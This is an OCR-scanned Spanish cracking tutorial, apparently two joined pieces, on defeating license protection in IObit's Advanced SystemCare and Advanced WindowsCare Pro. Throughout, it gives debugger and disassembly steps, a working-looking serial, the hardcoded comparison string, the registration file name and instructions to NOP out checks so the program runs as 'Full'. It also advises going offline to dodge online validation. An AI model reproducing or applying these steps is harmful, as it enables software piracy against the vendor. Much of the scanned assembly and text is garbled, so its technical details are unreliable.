LL) Cc a re! y Mejora 


Servicios Activados 


Utilidades O Care! automatico 


Gran Optimizacion 


BIENNN!!!...aplicación una vez mas a Full...;-D. Si nos fijamos en la parte superior, ya 
no nos pone “FREE”, sino “PRO”, además, si hacemos clic en “Profesional”, en 
“Cuenta de Usuario”, nos sale lo siguiente: 


e Registrar: Advanced SystemCare e Registrar: Advanced SystemCare 


o Licencia del Autor 


Licencia del Autor 


Active su licencia para obtener las mejores prestaciones de Advanced SystemCare. Mientras 
mo instale la licencia, no obtentra las actualizaciones del programa ni acceso a la base de 
datos 


Informacion de licencia 


Instalar licencia Categoria: Requiere validacion 

E-mail: thund kslatinos.: 

Categoria de licencia: Requiere validacion es A EAT 

> — Codigo de licencia: FO069-5C76-8787-8787 
Codigo de licencia: FO69-5076-8787-8787 
7 7 Fecha de caducidad: N/A N/A dias para que caduqu 

Fecha caducidad: N/A N/A dias para que caduque E Y Y A 

Lugar de licencia: N/A 


Mas opciones Tipo de licencia: Profesional 


Ver licencias instaladas 
Pulsar para ver informacion sobre las licencias instaladas 


Instalar nueva licencia 
Pulsar para instalar o modificar las licencias actuales 


$ Ll Y 


Upgrade Current License 
Click to renew or purchase a new license 


0) Ayuda Exportar Licencia | Codigo Perdido 


Creo que llego la hora de decir...misión cumplida...jeje. ;-) 

Un comercial !!! 

Como vimos, la rutina solo compara los nueve primeros caracteres de nuestro serial con 
los verdaderos, además vimos que los demás caracteres no intervienen en la creación del 


serial verdadero, por lo que el serial podía haber tenido diferentes formas: 


+ y 069-5C76-8787-8787, F069-5C768787878787, F069-5C76<->THUNDER 


-11- 
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Siempre y cuando se respeten los 19 caracteres de longitud y el guión en la quint 
posición con los números correctos a cada lado. 


Ahh, otra cosa que se me olvidaba....los datos de registro son encriptados y guafdados' 
en un archivo en la carpeta de instalación del programa con el nombre “License: dat”; si 

deseas tener la app sin registrar nuevamente, haz una copia de seguridad 
antes de registrarla y en cualquier momento que desees la sobrescribes y listo. Lo que si 
no te recomiendo es que la elimines por completo, ya que el pro a lajutiliza para 
guardar otros datos de su funcionamiento y si la eliminas tendrás problemas... O 


) 


--->>>MISSION ENDING... 


Bueno, hasta aquí este tutorial, espero que lo hayan entendido todo o.al menos “algo” de 
lo que pude exponer en este texto. Como les dije, fue mas fácil y-menos trabajosa que la 
versión anterior, esto programadores!!!..bueno, mejor para nosotros...jeje. Discúlpenme 
los errores que pueda haber tenido, soy un chapucero sin remedio ;-D. 

Sus consejos y críticas serán bien recibidos en yuniet02015(whab.jovenclub.cu, deja tus 
sugerencias allí o en la lista, donde desees. 


Agradecimientos a todos los crackers que se dedican a escribir tutos y a compartir lo 
que saben de este hermoso arte, desde Ratón, Diablo Poeta, Guillermo, 
SACCOPHARYNX, Joe Cracker, Destripador £ Marmota, COCO, MAKKAKO, 
Lisa Alquimista, y muchos mas de los que escriben teorías, he leído y he aprendido lo 
que se. Por supuesto, al maestro Ricardo Narvaja, gracias por tu ayuda desinteresada y 
por tu tiempo con este newbie y con todos los que lo necesitan. Muchísimas gracias a la 
web www.crackmes.de y a la gente de elhacker.net por tener ese espacio de Ingeniería 
Inversa y por estar dispuestos a ayudar siempre...esos muchachos están escapaos...jeje. 
Un saludo a todos los crackers alrededor del mundo y a ti por tu tiempo en leer este tute. 
Y este es el fin...nos vemos en otro...quizás...quien sabe. 


THE TRUTH IS. DODUT THERE 


THUNDER 


SEEK IT 
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THE TRUTH IS OUT THERE 


THUNDER 


SEEK IT 


Un saludo para todos los listeros y FELIZ AÑO NUEVO!!! Bueno, /aquí estoy una vez 


mas con una nueva aventura, la numero dos. Esta vez será'con una aplicación que llevó 
trabajo doble...bueno, ya verán a lo que me refiero, por lo que, aunque no es muy nueva 
(2006), me pareció interesante hacerle un tute y compartirla. Para trabajar con ella hay 
que desconectarse de la red, en caso de estar conectados a Internet, para poder 
crackearla sin inconvenientes. Espero que les guste y que, aquellos que se inician en 
esto puedan aprender algo al igual que yo lo hice. Aclarar que no soy un experto, solo 
un aprendiz con deseos de compartir lo que sabe y lo que aprende, por lo que le pido 
disculpas a los maestros si en algún momento(s) me equivoco o meto la pata en algo, o 
no hago las cosas de la mejor manera, discúlpenme, estoy aprendiendo, y sus criticas y 
consejos serán muy bien recibidos en todo momento. Bueno, basta de bla, bla, bla y 
manos a la obra, que tenemos trabajo que hacer. 


--->>>MISSION BRIEFING... 
Víctima: Advanced WindowsCare Pro 
Versión: v2.5.7.941 
URL: http: //www.iobit.com 
Protección: Serial+Nag 
Dificultad: Newbie Avanzado (Al menos para mi) 


RDG Packer Detector, ResHacker, DeDe, 


Herramientas: OllyDbg y plugins. 


Compilador: Borland Delphi v6.0 - v7.0 


Cracker: Thunder 


Lugar/ Fecha: Cuba - 04/01/2009 
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--->>>VICTIM INFO... 


Advanced WindowsCare 2 Professional provides an Always-On and Automated, 
One PC Care Service with anti-spyware, privacy protection, performance tune- 
system clean. With "Install It and Forget It" feature, it works automatically a 
in the background on your computer, constantly keeps your computer safe 
and running at top speed. 


Compared with its nearest competitor, Advanced WindowsCare 2 Professional provides 
the more essential and practical formula for Windows. This amazing,product only costs 
$29.95 per year for up to 3 PCs. 


-Install It and Forget It 
-Removing Spyware and Adware 
-Preventing Security Threats 
-Privacy Protection 

-Fixing Registry Errors 
-Temporary Files Cleanup 
-Startup Cleanup 

-Repairing Windows 

-Speeding up System 


Benefits 


Easiest to Use 

Install it and forget it. Works continuously, automatically and quietly in the background 
on your PC, allowing you to have fun and be more productive. Updates itself in a smart 
and automated way. 


Protects Your PC 

Scans and removes spyware and adware with the latest definition. Prevents spyware, 
hijackers and bad websites from being installed. Erases the history of all activities in 
your computer. 


Repairs and Maintains Your PC 

Scans and fixes invalid and improper registry entries. Detects and removes invalid 
startup items. Repairs system configurations, eliminates system bottlenecks and 
prevents crashes. 


Improves Your PC Performance 

Searches and Cleans up unused Windows garbage. Fully optimizes Windows for 
ultimate system performance and top Internet speed, based on how you use your PC and 
what kind of network you have. 


More... 
Proyides, with extra useful system tools. Analyzes and shows detailed information of 
h a and Windows. 


Advanced WindowsCare v2 Pro Cuba - 01/2009 


--->>>ATTACKING... 


Bueno, al parecer, una herramienta bastante completa. La ejecutamos y nos sale 1 
que a su vez sirve de caja de registro 


[3] Subscription of Pro Edition 


3 Subscribe o 3 


Purchase Now, Get Maximum Performance. 


The free trial version only allows you to scan problems. To fix them 
and dramatically improve system performance, please click 
Purchase Online to get this tantastic product now. Registered user, 
please enter your license information and activate the licensed 
version. 


Account Hame Thunder 


Company Home 


License Code 87878787 


Need help on registration? 


Pongo mis datos en cada caja de texto y doy en el botón “Register”. 


Product Registration 


Q Invalid User Name or License Code! Please enter the license again, 


Valla, parece que no se trago ese cuento...jeje. Vamos a ver de que esta realmente 
hecho. Para esto vamos al RDG Packer Detector y... 


nr OCKeY DELeCÍOr VO oo =) x) 


CAArchivos de programa Obit£dvanced WindowsCare W2 


6) 16) 
Borland Delphi v6.0 - v7.0 Compilador 


Nada Detectado 


>) Posible >) 
Comtáció : Al Frente [] 


«y du 1") Detectar 
O Archivo Escaneado en 06 Seg. (O MA Co M-B 03009030 47 


a, delphi y sin empaquetar, o esta gente están muy seguros o no tenían para pagar un 
Cker...bueno, mejor para nosotros ;-) 
ramos contra el Olly y vamos a ver si canta o no 
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2% PhantOm - [0-0 main thr3ad, mOdule Awc] 
ej File View Debug Plugins Options Window Help Tools BreakPoint-> 
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[ECCACORE 33 daa Aaa rs ama] 


FEE 
aSBO 5 


CCE LEC ES 


8BEC 

B9 oseBBaaa 
6A aa 

£A 60 

49 

75 F9 

53 

B3 7CFESAGO 
ES 4671ESFF 


MOU EBP,ESP 
MOU_ ECX,5 
PUSH B 
PUSH_O 
DEC ECx 


PUSH_EBX 
MOU EAX, Awo. BASAFE7C 


8B1D 38655BM01 MOV EREn ao PTR DS: [5B6538] 


3300 

55 

68 EDOS5B00 
64:FF30 


64:8920 
Es FDCSFFFF 
38400 


28D45 EC 

ES 29EAFFFF 
8B45 EC 

BA FS085B00 
ES CO4CESFF 
74 3A 


8D55 ES 
22 O1a0aAaRnaR 


Awc.<Modu leEntryPoint 


PUSH Awc. VOSBOSEO 
PUSH_DWORD_PTR_FS: [EAXJ 

MOU DWORD _PTR FS: [EAX],ESP 
TEST AL,AL 

LEA EAX, DWORD_PTR SS: [EBP-14] 


MOU EAX, DWORD _PTR SS: LEBP-14] 
MOU EDX, Awc. BASBOSFS 


LEA EDX, DWORD PTR SS: [EBP-18] 
CUE] 


| Command 


Avec. BBSB7C18 


ASCII "blindows Vista” 


| Program entry point 


No tiene cara de ser un OFP, pero bueno... 


Ahora, si nos vamos por las String References, no vamos a sacar nada, además que las 
famosas GetDigltemTextA, GetWindowTextA, GetWindowTextW, no van a picar aquí. 
Ahora, si nos acordamos del compilador con el que nos enfrentamos, nos salta una idea 
DEDE. Antes de ir con él, hago uso de un plugin del Olly, el Window 
Juggler, y de esta manera saber los class names (forms), en los que necesito husmear, 


a la cabeza.. 


por lo que obtengo esto 


WindowJuggler plugin v0.06 BETA sn deal £va 


Wind Handle: 0x220740 
Wnd ld: 0x0 
Class Name: —TForm5 


Copy to Clipboard 


Caption: Subscription of Pro Edition Set 
Click | Enable Show Maximize Topmost 
Close | | Disable Hide Minimize | | Non-Top 


To select a window press SHIFT and move the mouse cursor over it 


WindowJuggler plugin v0.06 BETA y El kva 


| nd Handle: [UX50624 
nd ld: 0x0 


| Class Name: —TForml 


Copy to Clipboard 


| Caption: Advanced WindowsCare W2 Professional Set 
Click Enable | Show Maximize Topmost 
Close Disable Hide Minimize Non-Top 


To select a window press SHIFT and move the mouse cursor over it 
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Ahora si voy al DeDe y cargo mi aplicación, con el adelanto de que ya se donde deb 


buscar. 
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Classes Info Units Info Forms Project 
TForm5 


Events | Controls 


orm1Ú 
TForm11 
TForm2 
TForm3 
TFormá 


TFormb 
TForm? 
TForm8 


Espero que termine de analizar la aplicación y me dirijo a la pestaña de procedimientos, 
especificamente en las Unit con Class Name “TForm5” y “TForm1”, que son la Nag y 
el form principal, respectivamente. Allí, en la Nag, busco el botón “Register”, que es el 
que me interesa para analizar su código y ver que es lo que pasa cuando le doy clic. Si 


busco me voy a encontrar con 


FormCreate 

Button3Click 
Editl Change 
Buttorl Click 
Timerl Timer 
Edit3Change 
Label? Click 

Button2Click 


Formáctivate 


Si leo su caption me doy cuenta de que debe ser este y el caption que yo busco 
“Register”, se le debe asignar al control en tiempo de ejecución, por lo que si el 
programador lo hizo a propósito para despistarnos, perdió su tiempo...jeje. Así que, 
copio la dirección del evento del botón y veo algo interesante también, un Timer, que 
será?, bueno, por si acaso le copio también la dirección. Ahora si, vamos al Olly y 
vamos a poner BPs en estas dos direcciones de memoria y vamos a ver que pasa. Corro 
el programa, me genera una excepción que paso con Shift+F9 y me cae en la Nag de 
registro, vuelvo a introducir mis datos y de clic al botón “Register” y el Olly me salta 


aquí. 


FormCreate 
Button3Click 
Editl Change 
Button] Click 
Timerl Timer 
Edit3Change 
Label?Click 
Button2Click 
Formá.ctivate 


Buttoni Click 


Event = OnClick 
Owner = Button1(TButton) 
Caption = 'reg now' 
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.v 74 08 
8850_40 
ES 67FFFFFF 
C3 


Es_B2D5FCFF 
38B73 38 
25F6 

74 40 

le 40 00 
6A 06 

6A al 

3B43 34 

50 

ES 10D7FCFF 
35c0 

8D55 FC 

Ai FC675BD0 
ES EBC4FCFF 
284D FC 

B2 61 

Al 44AD4100 


ES 3839FDFF 
ES 7398FCFF 


PUSH EBP 

PUSH Awc. 6043AFCB 
PUSH_DWORD_PTR_FS: CEAXJ 
MOU DWORD PTR FS: [EAX],ESP 


PUSH_1 
MOU EAX, DWORD PTR DS: [EBX+34] 
USH EAX 


CALL _<JMP. Suser32.KillTimer> 
MOU ESI,DWORD PTR DS: [EBx+38] 
TEST ESL,ESI 

CMP_BYTE PTR DS: [EBx+40],0 
JE SHORT Awc.B043AFB5 


Sé: e 3A O1CMP_ WORD PTR DS: [EBX+3A1,0 


PUSH_1 
MOU EAX, DWORD PTR DS: [EBxX+34] 
PUSH EAX 


CALL <JMP.Suser32. SetTimer> 
TEST ES 

LEA EDX, DWORD PTR SS: [EBP-4] 
MOU EAX, DWORD_PTR DS: [SB67FCI 


104 503 DWORD PTR SS: [EBP-4] 
Hoy Ene DWORD_PTR DS: [414044] 
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TimerID = 
[huos 


KillTimer 


Timerproc = 
Timeout 
TimerID = 


hlind 
SetTimer 


Ahora si estamos hablando. Por lo que veo, logro darme cuenta de que el Timer que 
vimos en el DeDe, es para algo y es usado en esta parte del código, en el evento clic del 
botón. Bueno pues si traceamos, veremos que lo que hace esta parte de código es 
desactivar el Timer y volverlo a activar, esta vez pasándole el parámetro de 100. ms, por 
lo que nuestro amigo va a ejecutarse ahora cada 100. ms. Si somos un poco habilidosos 
nos daremos cuenta que la parte caliente esta verdaderamente en el timer y no en el 
botón, por lo que vamos a hacer uso de nuestro segundo BP. Para esto damos F9 y el 
Olly vuelve a saltar, esta vez en el evento del Timer. 


8BEC 
B9 12000000 
6A 46 


DOE 
... 
, v 


55 
68 463895800 
64:FF30 


ES 6D2CEBFF 
8D55 E4 
ES 6FCCEEFF 


38B45 E4 
8D55 ES 


S3BFO +¿ERX 
ne 44675B01 MOU EDI,DWORD PTR DS: [5B6744] 


Z0R EAX, ERX 

PUSH EBP 

PUSH Awc. 105383946 
PUSH_DWORD_PTR_FS: CEAXJ 
MOU DWORD_PTR FS: [EAX],ESP 


33D2 2» EDX 
2836 34030001 MOU EAX, DWORD _PTR DS: [ESI+334] 


LEA EDx, DWORD PTR SS: [EBP-1C] 


2886 _2C030001 MOV EAX, DWORD PTR DS: [ESI+32C] 


mou E DWORD PTR SS: [EBP-1C] 
LEA EDxX, DWORD _PTR SS: [EBP-18] 


Awc. BOSBAD44 
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Empiezo a tracear con F8 y paso unos CALL sin importancia, hasta que llego a est 
parte del EE 


ES EFCCERFF TOMA EL SERIAL i 
8B45 E MOU EAX, DWORD PTR SS: [EBP-1C] EE " 
LEA EDX, DWORD_PTR SS: CEBP-18] 


8D55 E 
5 EcicEsFF 

8B55 ES MOU EDX, DWORD PTR SS: [EBP-18] 
3B86 2C03080801 MOU EAX, DWORD_PTR DS: [ESI+320] 


ES ar 
LEA EDX, DWORD PTR SS: [EBP-24] 
ses e cdgconal 160 EAX, DWORD PTR DS: [ESI+324] 
Bas 


MOU EAX, DWORD PTR SS: [EBP-24] 
LEA EDX, DWORD _PTR SS: [EBP-20] 


8D55 El 
En Esicesrr 

MOU EDX,DWORD PTR SS: [EBP-20] 
ses o EAX,DWORD_PTR DS: [ESI+324] 


TOMA EL NOMBRE 


E E Mov 

Al ASB74100 |mMOU Er DWORD PTR DS: [4187A8] 
ES S3BCE?FF 

8945 EC MOU DWORD PTR SS: [EBP-14],EA%X 
B2 61 MOU DL, 1 

Al 64B44100 [|MOU EAX, DWORD PTR DS: [418464] 


534 EA ¡ 

MOU DWORD PTR El CEBP-107,EAX 
LEA EDX, DWORD PTR SS: [EBP-28] 

EE Scosanal HU EAX, DWORD PTE DS: [ESI+320] 

ES B3CCEEFF 

nan pa MOU EAX, DWORD PTR SS: [EBP-28] 

8D4D LEA ECX, DWORD PTR_SS: [EBP-4] 

BA Cossseuo MOU_ EDX, Awc. BOSESI6N ASCII "Xuegiushi” 

ES 43120000 
LEA EDX, DWORD PTR SS: LEBP-2CJ 

8B86 24030001 MOU EAX; DWORD PTR DS: [ESI+324] 


En la imagen están comentadas las acciones que se realizan en esta parte. En el CALL 
00588374 se toma el serial y en las llamadas siguientes se realizan operaciones de 
verificación y movimientos de memoria. A partir de la llamada 0058839B se hace lo 
mismo con el nombre y al CALL 005883F0 se entra con el serial y una string. Dentro 
de dicha llamada se hacen varios movimientos de memoria, pero nada importante, al 
menos que mi cerebro lo reconociera. ;-) 

Salimos del CALL y seguimos traceando. Nos encontramos con varias llamadas que se 
llevan nuestro serial y alguna string y hacen sus cosas, pero nada que nos preocupe. 
Hasta que llegamos aquí 


TOMA EL SERIAL A |Registers (FPU) 
CIT ” 87 


ES SOCBEEFF 
8B45 C4 MOU EAX, DWORD_PTR SS: [EBP-3C] EAR DISEFE 
EC> 


BA 80895808 | MOV A CAGEDAO ASCII "DAFEE1FO9D3S4FE6"” 


ES 88CEE?FF 
MESSCA SETNE, Al 


Como vemos se toma nuestro serial y se pasa a EAX, asimismo se toma otra stringímas 
parecida a un serial) y se pasa a EDX. Ahora si vamos a entrar en ese CALL. 


PUSH EBX 


CMP_EAX, EDX Awc. 10538988 
TEST ESI,ESI 

TEST EDI,EDI 

MOU EAX, DWORD PTR DS: [ESI-4] 
MOU ap DWORD PTR DS: [EDI-4] 
| SUB_EAX, EDX 
ADD EDX, EAX 
PUSH_EDX 
SHR_EDx, 2 

MOU ECx,DWORD PTR DS: [ESIJ 
MOU EBX, DWORD PTR DS: [EDI] 
CMP ECX, EBX 

DEC _EDx 


MOU ECx, DWORD PTR DS: [ESI+4] vw 
MAY FRX. AMARA PTR NS: PFNT+41 


I "DAFEE1FO9D 


CALL, veremos la instrucción SETNE AL, que pone el byte en el operando a l si la 
bandera cero está limpia, si no pone el operando a 0. En nuestro caso es F8, por lo que 
lo pone a 01. 
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OF95CO [SETNE AL 
no BL, AL 


OU EAX, DWORD _PTR_DS: [EDI 
c689 a BYTE _PTR DS: CEAX+57C1, 1 


SE? | MOU EAX, DWORD_PTR_DS: LEDIJ 
C6sa 7Cosanal MOU BYTE PTR DS: [EAX+57C0],0 
8D45 Co LEA EAX, DWORD_PTR SS: [EBP-40] 
Es 3D730200 

8D45 Co LEA EAX, DWORD _PTR_ SS: [EBP-408] 
BA 9C395300 nou EDX, Awc. BBSS399C ASCII "msurc20.dl!l” 


ES 14CDE7?FF 

8B45 Ca | MOU EAX, DWORD _PTR SS: [EBP-40] 
Es 6C27ESFF 

3c el lia AL, 1 

75 25 BAD BOY 
8D45 BC CER EAX, DWORD_PTR SS: [EBP-44] 
Es 60730200 

8D45 BC 


LEA EAX, DWORD _PTR_ SS: [EBP-44] 
BA 2C38953800 |MOU EDX, Awc. BBSS399C ASCII "“msurc20.dll” 
ES _F3CCE?FF 

8B55 BC MOU EDX, DWORD PTR SS: [EBP-44] 
2B07 MOU EAX, DWORD PTR DS: [EDI] 
28B80_4C030001 MOU EAX,DWORD_PTR DS: [EAX+34C] 


ES 4754FBFF 
8807 | MOU EAX, DWORD PTR_DS: [EDIJ 
S0B8 7COsegal CMP EVTE PTR DS:LEAX+57CJ, 1 
OFS5 36030001 JNZ Awo. BASSSSLE BAD BOY 


BAD BOY 


BORO 


Mas abajo esta la comparación de los dos registro (el nuestro debería haber sido 00) y 
los saltos mas abajo que me irán llevando de poco a poco al mensaje de error. Bueno, 
damos F9, aceptamos el cartel de error e introducimos nuestro nuevo serial. Cuando 
llegamos a esta parte nuevamente. 


ES SSCEE?FF e 
F95CO SETNE AL pS isters (Fl 


7 A e 
o 
7 
a] 
pa] 
al 
- ad a] 
F 
RORODDA 


BAD BOY 
8B07 MOU EAX, DWORD_PTR_DS: [EDIJ 
o MOU BYTE PTR DS: [EAX+57C], 1 


2B07 MOU EAX, DWORD_PTR_DS: [EDI] 
Cesa 7Coso001 MOV BYTE PTR DS: [EAX+57CJ],0 
8D45 Co LEA EAX, DWORD_PTR SS: [EBP-40] 
Es 80780200 


8D45 Co LEA EAX, DWORD _PTR SS: [EBP-40] 
BA 9C8953800 |MOU EDX, Awc. BBS3899C ASCII "smsurc20. dll” 
ES 14CDE?FF 
8B45 CO MOU EAX, DWORD _PTR SS: [EBP-40] 
50 id 


Mu... 


DANAUDDO 


... +. +. un. 


CHP Shbk 


BAD BOW 


LEA EAX, DWORD_PTR SS: [EBP-44] 


Es 6C730200 
8D45 BC LEA EAX, DWORD _PTR SS: [EBP-44] 
BA 90895808 [MOU EDX, Awc. BBS3399C ASCII "smsurc28. dll” 


ES F3CCE?FF 

MOU EDX, DWORD PTR SS: [EBP-44] 
MOU EAX, DWORD PTR DS: [EDI] 
3B80_4C030001 MOU EAX, DWORD _PTR DS: [EAX+34C] 


ES 4754FBFF 
Seo? MOU EAX, DWORD _PTR_DS: LEDIJ Mmpty 
S0BS 7Casaoal CMP BYTE PTR DS: [EAX+57CJ, 1 j 


] | dd mpty 


y MA 


TODO 


Ahora si no hay problemas, vemos como no efectúa los saltos malos y me guarda los 
datos de registro en este archivo msvrc20.dll. Bueno, salgo de la rutina, presione F9 y 


e 
1 ) Thank you for the subscription! The program has been activated now, 


Aceptar 


Bpéno, doy aceptar y me sale la aplicación en su ventana principal. Ahora, les había 
Lich que se desconectaran de la red, en caso de estarlo, pues nuestro amigo al parecer 
quiére ir a su casa a verificar el número de serie. Nosotros no queremos complicaciones 
con nadie, por lo que no lo dejamos hacerlo. 
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5] Advanced WindowsCare V2 Professional 


14 Advanced Restore Center Tools Options 
ali] WindowsCare 2 
E 


Professional 


Y Subscription Service Attention 
«$ Computer Type Daily Use 
A) Network Connection General 
A, Auto-Care ot 
A Auto Update of 


Advanced WindowsCare Pro e 


A Network is not available now, please check it out and retry. 


License Information 
Y User Account: 


A Expiration Date: 


Al parecer estamos registrados, aunque no me gusta mucho como se ve la 
aplicación...muchos cartelitos rojos y además un “Unknown” como fecha de 
vencimiento. Bueno, vamos a reiniciar la aplicación y veamos que pasa. 


3) Subscription of Pro Edition 


ÑE Subscribe 


Purchase Now, Get Maximum Performance. 


The free trial version only allows you to scan problems. To fix them 
and dramatically improve system performance, please click 
Purchase Online to get this fantastic product now. Registered user, 
please enter your license information and activate the licensed 
version. 


Purchase Online 


Company Register 


Need help on registration? 


Account Hame 


Vaya, me lo imagine. Al parecer hasta que el registro no sea validado en Internet, de 
nada nos va a servir. Mmm, no queda de otra que empezar a parchear y eliminar todo lo 

ue nos recuerde que no esta registrado, a mano. Primero tenemos que deshacernos de 
t Nag inicial. Vamos de nuevo al DeDe, a ver que podemos sacar. 
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dcsiadil Units Info Forms || Procedures Project Exports 


TForml 


Events | Controls | [Show classes having no pi 


TFomm11 
TFomn2 ormCreate 00580B9C 


abell |MouseMove DOSS0B 


Me voy a la Unitl(Form Principal) y copio la dirección del evénto ÓnCréate, para ver 
que tenemos allí. Cargo una vez más la App en el Olly/y pongo un BP en dicha 
dirección. Corro con F9 y caigo aquí. Empiezo a tracear y me meto en el primer CALL. 


MOU EBx EAXx 


26D3 

ES SCBSFFFF 
ES AFEÍFFFF 
28883 ACO4B0B1 MOV EAX, DWORD PTR DS: [EBx+4AC] 
2650 40 MOU EDx, DWORD PTR DS: [EAX+408] 


38B83_B4040001 MOU EAX, DWORD PTR DS: [EBxX+4B4] 
Es 733BEFFF 

C6B5 4CADSBO! MOV BYTE PTR DS: [SBAD4CI, 1 

5B POP EBXx 


c3 


Traceo bastante código ;-([ como para morirse, en el que la aplicación busca sus 
configuraciones en varios archivos y toma todo lo necesario para iniciar. Después de 
que por poco se me quedara pegado el dedo en el F8, llego a esta parte del código que es 
bastante extraña. 


BA 13545780 [MOU EDx, Awc. 6057E413 


BFSS 45010001 

808D 4S8FFFFFI LEA ECx, DWORD PTR SS: CEBP-B8] 
28506 MOU EAX, DWORD PTR DS: [ESI] 
8B80 Eee [E O E PTR DS: [EAX+5A8] 


BA B6nBBaBa 
E. Hoy ER: DUERO PTR_DS: [EAXJ 


BC 
se3s 4SFFFFFI MOV EDX, DWORD PTR SS: CEBP-B8] 
MOU EAX,OWORD PTR DS: [ESIJ 
2880 83040001 MOU EAX, DWORD_PTR DS: [EAX+488] 


ES DITBEFFF 

2806 DU EAX, ota PTR DS: [ESI] 
SBS0 88040001 MOU EAX, DWORD PTR DS: [EAX+488] 
8B40 68 MOU EAX, DUORD PTR DS: [EAX+68] 
BA FFOGBGBaS [MOV EDX, OFF 

ES 3SCBEAFF 
8D08D 44FFFFFI LEA ECx, DWORD PTR SS: [EBP-BC] 
2806 MOU EAX, DWORD PTR DS: [ESIJ 
2880 _ASOSO0B61 MOU EAX, DWORD PTR DS: [EAX+5A8] 
BA BS00B0Ba [MOV EDX, 

AE RS MOU EBX,OWORD_PTR DS: [EAX] 


FFS3 BC 
8B95 SES [i AO DWORD PTR SS: [EBP-BC] 
2806 ORD PTR DS: [ESI] 
8880 3S0s00al NOU En DWORD_PTR DS: [EAX+538] 


ES 997BEFFF 
2806 MOU EAXx,OWORD PTR DS: [ESIJ 
pre 33059001 MOV EAX, DWORD PTR DS: [EA*+538] 


MOU ECX, DWORD_PTR_DS: CEAX] 


2806 MOU EAX, DWORD PTR DS: [ESI] 
2880 54059001 MOU EAX,DWORD_PTR DS: [EAX+554] 


ES _S53uEFFF 

2806 U EAX, DWORD _PTR_DS: [ESIJ 
C6s0 B105000Í MOV BYTE PTR DS: [EAX+5B1],1 
2806 MOU EAX, DWORD PTR DS: [ESI] 
2680 600409001 EAX, DWORD PTR DS: [EAX+460] 
2890 68810001 EDx, DWORD PTR DS: [EAX+168] 
2806 MOU EAX, DWORD PTR DS: [ESIJ 
EAXx, DWORD_PTR DS: [ERX+544] 


z 
mr 
[sa] 
a] 


z 
2 
o 
1)" 
E] 
[=l 


z x 
o 1] 
pra] 
m 
o 
X? 
mt 
o 
x 


al entra “Full”, “Expired”, “Ok”, por lo que me lleva a pensar que esta parte es la e 
¿decido el modo en el que se iniciara el programa. No se ustedes, pero a mi me gusta 
- mucho la parte de “Full”...jeje. Vamos allá. 
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8B85_3S8FFFFF! 
BA 3CE45700 
ES _777DESFF 
BFSS 3981000 
208D 34FFFFF! 
2806 


2680 ASOSODA! 
BA Bó6nuBaBa 


FFS3 BC 
8B95 S34FFFFF 
SB06 

8888 88040001 MOU_EAX, DIOR 


MOU EAX, DWORD _PTR SS: [EBP-C83] 
MOV EDX, Awc. BOS7E43C 


LEA ECK, DWORD PTR SS: [EBP-CC] 
MOU EAX, DWORD PTR DS: [ESIJ 
Y di PTR DS: [EAX+548] 


MOU EBX; DWORD_PTR_DS: [EAXJ 
MOU EDx, DWORD PTR SS: CEBP-CC] 


MOU EAXx, DWORD PTR DS: [ESI] 
D_PTR DS: [EAx+488] 


Cuba - 01/2009 


ASCII "Full" 


Como vemos el salto de arriba se toma y llegamos aquí. Como”vemos también, este 
salto va a tomarse de igual manera, pero, no lo vamos a permitir, así que lonopeamos. 


8B85_38FFFFF! 
BA 3CE45700 
S 777DESFF 


90 

2D3D 34FFFFFI 
2806 

2650 ASBSOBaI 
E pl 


pss e 


680 7COSODa 
E9 13060000 | 
808D 1CFFFFF! 
33D2 


Y > 


FFS3 6Cc 
8B35_1CFFFFFI 
BA 6CE45700 
ES CSrBESFF 
BFSS 28010001 
2B06 
Có6so B1050001 
16 


SO ODO E 


MOU EAX, DWORD _PTR SS: [EBP-C8] 
MOU EDXx, Awc. BB57E43C 


CALL Awc. 004052F0 
NOP 


NOP 

LEA ECx,DWORD PTR SS: [EBP-CC] 
MOU EAX, DWORD PTR DS: [ESIJ 

MOU EAX, DWORD PTR DS: CEAX+5A8] 
MOU EDx, 6B6 

MOU EBX,DWORD_PTR_DS: [EAXx] 


, DWORD 
HOU BUTÉ PTR DS: CEAR+E?CI, B 


LEA ECx,DWORD PTR SS: [EBP-E4] 
Z0R EDx, EDX 

MOU EAx, DWORD PTR SS: [EBP-26] 
MOU EBx,OWORD_PTR DS: [EAX] 


MOU EAXx, DWORD _PTR SS: [EBP-E4] 
MOU EDXx, Awc. 0B57E46C 


MOU EAXx,OWORD_PTR_DS: [ESIJ 
MOU BY mE T 
mMOU E 


ASCII "Full" 


ASCII "Expired” 


Llegamos a este salto el cual nos envía mas abajo casi al final de la rutina, donde pasa 
por unas llamadas finales y sale completamente. Bueno doy run y... 


Subscription of Pro Edition 


3 Subscribe 


Purchase Now, Get Maximum Performance. 


The free trial version only allows you to scan problems. To fix them 


and dramatically improve system performance, please click 


Purchase Online to get this fantastic product now. Registered user, 


please enter your license information and activate the licensed 


version. 


Account Hame 


Company 


License Code 


Need help on registration? 


Purchase Online 


...parece que no le atinamos. Vamos de nuevo a mirar un poco. Mas abajo 


las demás strings que mencione arriba “Expired” y “Ok”, la primera no me gusta, 


ás que con el último salto le pasamos por arriba, por lo que me voy por la segunda. 
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Vamos a cambiar ese salto en 0057D703 y vamos a hacer que caiga aquí en 0057D859, 
que, como vemos, es el destino de otro salto. 
ES BSCFEBFF 


e 


LEA ECX, DWORD PTR SS: [EBP-F8] 
XOR EDX, EDXx 


MOU EAX, DWORD PTR SS: [EBP-26] 
MOU EBx,DOWORD_PTR DS: [EAX] 


FFS3 BC 
8B85 BSFFFFFIMOU EAX, DWORD PTR SS: [EBP-F8] 
BA 7CE45790 [MOU EDX, Awc. BBS7E47C ASCII "Ok" 
ES _ 777AESFF 
BFS5 BOB100Bt 
2806 


.... +... se 


MOU EAX,OWORD_PTR_DS: [ESIJ 
S0B8 rCosobÓ1 CMP BYTE PTR DS: [EAX+57C1,1 


BFSS 80040001 
B2 al 


1 
9%. DMORO_PTR 


| 
Seguimos bajando y nopeamos los dos saltos que vemos mas abajo, ¡pues estos me 
llevaran a donde no queremos ir, al fracaso. O 


de) 


FFS3 BC 
3B35 OSFFFFFI MOU EAX, DWORD _PTR SS: [EBP-F3] 
BA 7CE45700 |MOU EDX, Awc. BBS7E4PC ASCII ”Ok" 


ES 777AESFF CALL Fuc.B4052F0 
90 


NOP 
8B06 MOU EAX, DWORD _PTR_DS: [ESIJ 
> a BYTE PTR DS: [EAX+57C7, 1 


B2 01 MOU DL, 1 
Ai 9C0D04400 |MOU EAX, DWORD PTR DS: [449D09C] 


ES GES6ECFF | CALL Rue. 00440FAS 


MOU EAS, EDI 
MOU EBX, DWORD_PTR_DS: [EAXJ 
Auc. 00420938 


